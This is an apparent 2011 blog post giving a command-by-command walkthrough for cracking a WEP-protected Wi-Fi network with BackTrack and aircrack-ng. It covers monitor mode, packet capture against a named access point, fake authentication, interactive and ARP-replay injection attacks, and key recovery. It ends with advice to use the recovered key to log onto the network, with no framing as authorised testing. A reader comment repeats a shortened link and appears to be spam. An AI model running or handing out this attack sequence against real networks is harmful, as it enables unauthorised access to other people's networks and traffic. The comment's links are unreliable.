September 16, 2011

Crack WEP

Hardware selection
aircrack-ng.org/doku.php?id=compatibility_drivers

madwifi-project.org/wiki/Compatibility

Install BackTrack Linux
backtrack-linux.org

Test hardware
List interfaces
airmon-ng

Enable monitor mode
airmon-ng start wlan0

Test injection
aireplay-ng --test mon0

Assoicate with the AP
Find target AP
airodump-ng mon0

Start capture
airodump-ng -c 11 --bssid 30:46:9A:A3:7C:06 -w GOBIN mon0

Fake authentication with AP
aireplay-ng --fakeauth 0 -a 30:46:9A:A3:7C:06 mon0

Interactive frame selection attack
aireplay-ng --interactive -p 0841 -c FF:FF:FF:FF:FF:FF -a 30:46:9A:A3:7C:06 mon0

WEP-encrypted ARP request packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes.

Standard ARP-request replay attack
Use this attack only if there is an active client.

aireplay-ng --arpreplay -b 30:46:9A:A3:7C:06 mon0

Crack
aircrack-ng GOBIN-01.cap

It is usually 10000-34000 IVs to find the key. The WEP key appears next to "KEY FOUND". Drop the colons and enter it to log onto the network.

Links

aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase
backtrack-linux.org/forums/backtrack-5-beginners-section/40837-injection-working-but-no-data-increase.html
backtrack-linux.org/forums/backtrack-5-beginners-section/41824-cant-get-arp-request-0-pps-packet-sent.html
lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack

1 comment:

  1. Here I have shared my sample:- http://bit.ly/1Nbfgm6
    sometimes it is difficult to manage airodump-ng output files. i mean once i generate those csv and xml files then after i start looking into it so for large amount of data i can't figure it out. so is there any tools or services available for analysis and visualization ? i have used this website and it is quite good, here i have shared my sample data have a look and also share any other sources if anyone knows. - http://bit.ly/1Nbfgm6

    ReplyDelete